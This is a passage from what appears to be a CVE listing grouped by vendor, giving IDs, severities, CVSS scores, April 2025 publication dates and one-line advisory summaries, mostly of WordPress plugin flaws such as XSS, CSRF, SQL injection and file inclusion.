| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32695 | Critical | 9.8 | — | 2025-04-09 | Incorrect Privilege Assignment vulnerability in Mestres do WP Checkout Mestres WP checkout-mestres-wp allows Privilege Escalation.This issue affects Checkout Mestres WP: from n/a through <= 8.7.5. |
Metabase · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32382 | — | — | — | 2025-04-10 | Metabase is an open source Business Intelligence and Embedded Analytics tool. |
Miunosoft · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32599 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in miunosoft Task Scheduler task-scheduler allows Reflected XSS.This issue affects Task Scheduler: from n/a through <= 1.6.3. |
Mlc-ai · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32381 | Medium | 6.5 | — | 2025-04-09 | XGrammar is an open-source library for efficient, flexible, and portable structured generation. |
Mmetrodw · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31401 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in mmetrodw MMX – Make Me Christmas mmx-make-me-christmas allows Stored XSS.This issue affects MMX – Make Me Christmas: from n/a through <= 1.0.0. |
Mrcen · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3393 | Low | 3.5 | — | 2025-04-08 | A vulnerability was found in mrcen springboot-ucan-admin up to 5f35162032cbe9288a04e429ef35301545143509. |
Myworks · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32524 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MyWorks MyWorks WooCommerce Sync for QuickBooks Online myworks-woo-sync-for-quickbooks-online allows Reflected XSS.This issue affects MyW… |
N-media · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31599 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in N-Media Bulk Product Sync sync-wc-google allows SQL Injection.This issue affects Bulk Product Sync: from n/a through <= 8.6. |
Nababur · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3489 | Medium | 4.3 | — | 2025-04-10 | A vulnerability was found in Nababur Simple-User-Management-System 1.0. |
Nakivo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32406 | High | 8.6 | — | 2025-04-08 | An XXE issue in the Director NBR component in NAKIVO Backup & Replication 10.3.x through 11.0.1 before 11.0.2 allows remote attackers fetch and parse the XML response. |
Neoslab · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32633 | High | 8.6 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in neoslab Database Toolset database-toolset allows Path Traversal.This issue affects Database Toolset: from n/a through <= 1.8.4. |
Newsboard Plugin · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31402 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in NewsBoard Plugin NewsBoard Post and RSS Scroller newsboard allows Stored XSS.This issue affects NewsBoard Post and RSS Scroller: from n/a through <= 1.2.12. |
Nik00726 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2019-25223 | Medium | 4.9 | — | 2025-04-08 | The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.4 due to insufficient escaping on the user supplied parameter and lack of suffi… |
Nimbata · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32616 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in nimbata Nimbata Call Tracking nimbata-call-tracking allows Stored XSS.This issue affects Nimbata Call Tracking: from n/a through <= 1.7.4. |
Ninotheme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32481 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ninotheme Nino Social Connect nino-social-connect allows Stored XSS.This issue affects Nino Social Connect: from n/a through <= 2.0. |
Nirmal Kumar Ram · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32140 | Critical | 9.9 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Nirmal Kumar Ram WP Remote Thumbnail wp-remote-thumbnail allows Upload a Web Shell to a Web Server.This issue affects WP Remote Thumbnail: from n/a through <= 1.3.2. |
Odude · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32589 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in odude Flexi – Guest Submit flexi allows PHP Local File Inclusion.This issue affects Flexi – Guest Submit: from n/a thr… |
Oleglark · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32498 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in oleglark VKontakte Cross-Post vkontakte-cross-post allows Stored XSS.This issue affects VKontakte Cross-Post: from n/a through <= 0.3.2. |
Opplus · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3413 | Medium | 6.3 | — | 2025-04-08 | A vulnerability has been found in opplus springboot-admin up to a2d5310f44fd46780a8686456cf2f9001ab8f024 and classified as critical. |
Oxygensuite · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32631 | High | 8.6 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in oxygensuite Oxygen MyData for WooCommerce oxygen-mydata allows Path Traversal.This issue affects Oxygen MyData for WooCommerce: from n/a throug… |
Oz Forensics · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32367 | High | 8.6 | — | 2025-04-11 | The Oz Forensics face recognition application before 4.0.8 late 2023 allows PII retrieval via /statistic/list Insecure Direct Object Reference. |
Pagopar - Grupo M S.a. · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31032 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Pagopar - Grupo M S.A. |
Panasonic · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1073 | High | 7.5 | — | 2025-04-10 | Panasonic IR Control Hub (IR Blaster) versions 1.17 and earlier may allow an attacker with physical access to load unauthorized firmware onto the device. |
Payphone · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32523 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in payphone WooCommerce – Payphone Gateway wc-payphone-gateway allows Reflected XSS.This issue affects WooCommerce – Payphone Gateway: from… |
Phil · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31012 | Medium | 5.3 | — | 2025-04-09 | Missing Authorization vulnerability in Phil Age Gate age-gate allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Age Gate: from n/a through <= 3.5.4. |
Pickupp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32587 | High | 8.1 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in pickupp WooCommerce Pickupp wc-pickupp allows PHP Local File Inclusion.This issue affects WooCommerce Pickupp: from n/a through <= 2.4.3. |
Picture-planet Gmbh · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32676 | High | 7.6 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Picture-Planet GmbH Verowa Connect verowa-connect allows Blind SQL Injection.This issue affects Verowa Connect: from n/a through <= 3.0.5. |
Pimcore · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30166 | Medium | 4.8 | — | 2025-04-08 | Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. |
Piotnetdotcom · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32205 | Low | 2.7 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in piotnetdotcom Piotnet Forms piotnetforms.This issue affects Piotnet Forms: from n/a through <= 1.0.30. |
Plainware · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32623 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory z-inventory-manager allows Stored XSS.This issue affects PlainInventory: from n/a through <= 3.1.9. |
Powerdns · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30195 | High | 7.5 | — | 2025-04-07 | An attacker can publish a zone containing specific Resource Record Sets. |
Programphases · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31379 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in programphases Insert HTML Here insert-html-here allows Reflected XSS.This issue affects Insert HTML Here: from n/a through <= 1.0. |
Progress Software Corporation · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1968 | High | 7.7 | — | 2025-04-09 | Insufficient Session Expiration vulnerability in Progress Software Corporation Sitefinity under some specific and uncommon circumstances allows reusing Session IDs (Session Replay Attacks).This issue affects Sitefinity: from 14.0 through 1… |
Propanetank · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2017-20197 | High | 7.3 | — | 2025-04-09 | A vulnerability was found in propanetank Roommate-Bill-Tracking up to 288437f658fc9ee7d4b92a9da12557024d8bc55c. |
Purab · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31023 | High | 8.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Purab Seo Meta Tags seo-meta-tags allows Cross Site Request Forgery.This issue affects Seo Meta Tags: from n/a through <= 1.4. |
Quanganhdo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32482 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in quanganhdo Custom Smilies custom-smilies allows Stored XSS.This issue affects Custom Smilies: from n/a through <= 1.2. |
Rachel Cherry · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32537 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rachel Cherry Lock Your Updates lock-your-updates allows Reflected XSS.This issue affects Lock Your Updates: from n/a through <= 1.1. |
Radiustheme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32656 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Testimonial Slider And Showcase Pro testimonial-slider-showcase-pro allows PHP Local File Inclusion.This i… |
Rafasashi · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32612 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in rafasashi User Session Synchronizer user-session-synchronizer allows Stored XSS.This issue affects User Session Synchronizer: from n/a through <= 1.4.0. |
Rameez Iqbal · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32668 | High | 8.1 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Rameez Iqbal Real Estate Manager real-estate-manager allows PHP Local File Inclusion.This issue affects Real Estate Ma… |
Rankology · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32491 | Critical | 9.8 | — | 2025-04-11 | Incorrect Privilege Assignment vulnerability in Rankology Rankology SEO – On-site SEO rankology-seo-all-in-one-seo-analytics allows Privilege Escalation.This issue affects Rankology SEO – On-site SEO: from n/a through <= 2.2.4. |
Ratta · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32409 | High | 8.1 | — | 2025-04-07 | Ratta SuperNote A6 X2 Nomad before December 2024 allows remote code execution because an arbitrary firmware image (signed with debug keys) can be sent to TCP port 60002, and placed into the correct image-update location as a consequence of… |
Realmag777 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32569 | Critical | 9.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in RealMag777 TableOn posts-table-filterable allows Object Injection.This issue affects TableOn: from n/a through <= 1.0.4.3. |
Regen · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31391 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in regen Script Compressor script-compressor allows Stored XSS.This issue affects Script Compressor: from n/a through <= 1.7.1. |
Remcohaszing · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32014 | — | — | — | 2025-04-07 | estree-util-value-to-estree converts a JavaScript value to an ESTree expression. |
Renrenio · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3387 | Low | 3.5 | — | 2025-04-07 | A vulnerability classified as problematic has been found in renrenio renren-security up to 5.4.0. |
Reve Chat · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32559 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in REVE Chat REVE Chat revechat allows Stored XSS.This issue affects REVE Chat: from n/a through <= 6.4.4. |
Robert Noakes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31017 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Robert Noakes Nav Menu Manager noakes-menu-manager allows Stored XSS.This issue affects Nav Menu Manager: from n/a through <= 3.2.5. |
Roninwp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32663 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in roninwp FAT Cooming Soon fat-coming-soon allows PHP Local File Inclusion.This issue affects FAT Cooming Soon: from n/a… |
Rtakao · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31042 | Medium | 5.3 | — | 2025-04-09 | Missing Authorization vulnerability in rtakao Sandwich Adsense firsth3tagadsense allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sandwich Adsense: from n/a through <= 4.0.2. |
Rustaurius · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32694 | Medium | 4.7 | — | 2025-04-09 | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Rustaurius Ultimate WP Mail ultimate-wp-mail allows Phishing.This issue affects Ultimate WP Mail: from n/a through <= 1.3.10. |
Sandeep Verma · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32536 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sandeep Verma HTML5 Video Player with Playlist html5-video-player-with-playlist allows Reflected XSS.This issue affects HTML5 Video Playe… |
Sandor Kovacs · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32556 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Sandor Kovacs Simple Post Meta Manager simple-post-meta-manager allows Reflected XSS.This issue affects Simple Post Meta Manager: from n/a through <= 1.0.9. |
Sap · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31332 | Medium | 6.6 | — | 2025-04-08 | Due to insecure file permissions in SAP BusinessObjects Business Intelligence Platform, an attacker who has local access to the system could modify files potentially disrupting operations or cause service downtime hence leading to a high i… |
Scott Salisbury · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32483 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Salisbury Request Call Back request-call-back allows Stored XSS.This issue affects Request Call Back: from n/a through <= 1.4.1. |
Seeyon · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3402 | Medium | 6.3 | — | 2025-04-08 | A vulnerability was found in Seeyon Zhiyuan Interconnect FE Collaborative Office Platform 5.5.2 and classified as critical. |
Senior-walter · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3383 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in SourceCodester Web-based Pharmacy Product Management System 1.0 and classified as critical. |
Shahjada · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32279 | Medium | 4.3 | — | 2025-04-08 | Missing Authorization vulnerability in Shahjada Live Forms liveforms.This issue affects Live Forms: from n/a through <= 4.8.5. |
Shameem Reza · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31392 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Shameem Reza Smart Product Gallery Slider smart-product-gallery-slider allows Cross Site Request Forgery.This issue affects Smart Product Gallery Slider: from n/a through <= 1.0.4. |
Sharethis · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32282 | Medium | 4.3 | — | 2025-04-10 | Cross-Site Request Forgery (CSRF) vulnerability in ShareThis ShareThis Dashboard for Google Analytics googleanalytics.This issue affects ShareThis Dashboard for Google Analytics: from n/a through <= 3.2.3. |
Smartdevth · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3433 | Medium | 6.1 | — | 2025-04-08 | The Advanced Advertising System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.3.1. |
Sodena · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31383 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in sodena FrescoChat Live Chat flexytalk-widget allows Stored XSS.This issue affects FrescoChat Live Chat: from n/a through <= 3.2.6. |
Softclever Limited · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32579 | Critical | 9.9 | — | 2025-04-11 | Unrestricted Upload of File with Dangerous Type vulnerability in SoftClever Limited Sync Posts sync-posts allows Upload a Web Shell to a Web Server.This issue affects Sync Posts: from n/a through <= 1.0. |
Solwininfotech · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32677 | High | 7.6 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in solwininfotech WP Social Stream Designer social-stream-design allows Blind SQL Injection.This issue affects WP Social Stream Designer: fr… |
Specia Theme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32212 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Specia Theme Specia Companion specia-companion allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Specia Companion: from n/a through <= 6.3. |
Spring · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22232 | Medium | 5.3 | — | 2025-04-10 | Spring Cloud Config Server may not use Vault token sent by clients using a X-CONFIG-TOKEN header when making requests to Vault. |
Squiter · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32497 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in squiter Spoiler Block spoiler-block allows Stored XSS.This issue affects Spoiler Block: from n/a through <= 1.7. |
Stringfold · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3417 | High | 8.8 | — | 2025-04-10 | The Embedder plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ajax_set_global_option() function in versions 1.3 to 1.3.5. |
Studi7 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32116 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Studi7 QR Master qr-master allows Reflected XSS.This issue affects QR Master: from n/a through <= 1.0.5. |
Sudavar · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32500 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Sudavar Codescar Radio Widget codescar-radio-widget allows Stored XSS.This issue affects Codescar Radio Widget: from n/a through <= 0.4.2. |
Syammohanm · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3064 | High | 8.8 | — | 2025-04-08 | The WPFront User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.1. |
The Qt Company · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3512 | — | — | — | 2025-04-11 | There is a Heap-based Buffer Overflow vulnerability in QTextMarkdownImporter. |
Themehunk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2568 | Medium | 5.3 | — | 2025-04-08 | The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on the 'vayu_blocks_get_toggle_switch_values_callback' and '… |
Themeum · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32230 | Medium | 4.3 | — | 2025-04-10 | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Themeum Tutor LMS tutor.This issue affects Tutor LMS: from n/a through <= 3.4.0. |
Theode · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31382 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in theode Language Field language-field allows Stored XSS.This issue affects Language Field: from n/a through <= 0.9. |
Tianocore · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-38797 | Medium | 4.6 | — | 2025-04-07 | EDK2 contains a vulnerability in the HashPeImageByType(). |
Tiki · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32461 | Critical | 9.9 | — | 2025-04-09 | wikiplugin_includetpl in lib/wiki-plugins/wikiplugin_includetpl.php in Tiki before 28.3 mishandles input to an eval. |
Tim · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32489 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tim Wetterwarner wetterwarner allows Stored XSS.This issue affects Wetterwarner: from n/a through <= 2.7.3. |
Toast Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32243 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Toast Plugins Internal Link Optimiser internal-link-finder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Internal Link Optimiser: from n/a through <= 5.1.2. |
Totalprocessing · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32209 | Medium | 6.5 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in totalprocessing Nomupay Payment Processing Gateway totalprocessing-card-payments allows Path Traversal.This issue affects Nomupay Payment Proce… |
Tournamatch · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32600 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tournamatch Tournamatch tournamatch allows Reflected XSS.This issue affects Tournamatch: from n/a through <= 4.7.0. |
Tp-link · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3442 | — | — | — | 2025-04-09 | This vulnerability exists in TP-Link Tapo H200 V1 IoT Smart Hub due to storage of Wi-Fi credentials in plain text within the device firmware. |
Tp-link Corporation Limited · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32107 | High | 8.0 | — | 2025-04-11 | OS command injection vulnerability exists in Deco BE65 Pro firmware versions prior to "Deco BE65 Pro(JP)_V1_1.1.2 Build 20250123". |
Trusty Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32585 | High | 7.5 | — | 2025-04-11 | Path Traversal: '.../...//' vulnerability in Trusty Plugins Shop Products Filter trusty-woo-products-filter allows PHP Local File Inclusion.This issue affects Shop Products Filter: from n/a through <= 1.2. |
Twispay · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32601 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in twispay Twispay Credit Card Payments twispay allows Reflected XSS.This issue affects Twispay Credit Card Payments: from n/a through <= 2… |
Umbraco · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32017 | High | 8.8 | — | 2025-04-08 | Umbraco is a free and open source .NET content management system. |
Uncodethemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32496 | Critical | 9.6 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Uncodethemes Ultra Demo Importer ut-demo-importer allows Upload a Web Shell to a Web Server.This issue affects Ultra Demo Importer: from n/a through <= 1.0.5. |
Uzair · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31005 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Uzair Easyfonts easyfonts allows Cross Site Request Forgery.This issue affects Easyfonts: from n/a through <= 1.1.2. |
Vagonic · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32236 | Medium | 4.3 | — | 2025-04-10 | Missing Authorization vulnerability in Vagonic Woocommerce Products Reorder Drag Drop Multiple Sort – Sortable, Rearrange Products Vagonic vagonic-sortable.This issue affects Woocommerce Products Reorder Drag Drop Multiple Sort – Sortable… |
Vertim · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32565 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in vertim Neon Product Designer neon-product-designer-for-woocommerce allows SQL Injection.This issue affects Neon Product Designer: from n/… |
Vfvalent · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31393 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in vfvalent Social Bookmarking RELOADED social-bookmarking-reloaded allows Stored XSS.This issue affects Social Bookmarking RELOADED: from n/a through <= 3.18. |
Vibethemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32493 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VibeThemes BP Social Connect bp-social-connect allows Stored XSS.This issue affects BP Social Connect: from n/a through <= 1.6.2. |
Vikashsrivastava1111989 · 1 CVE
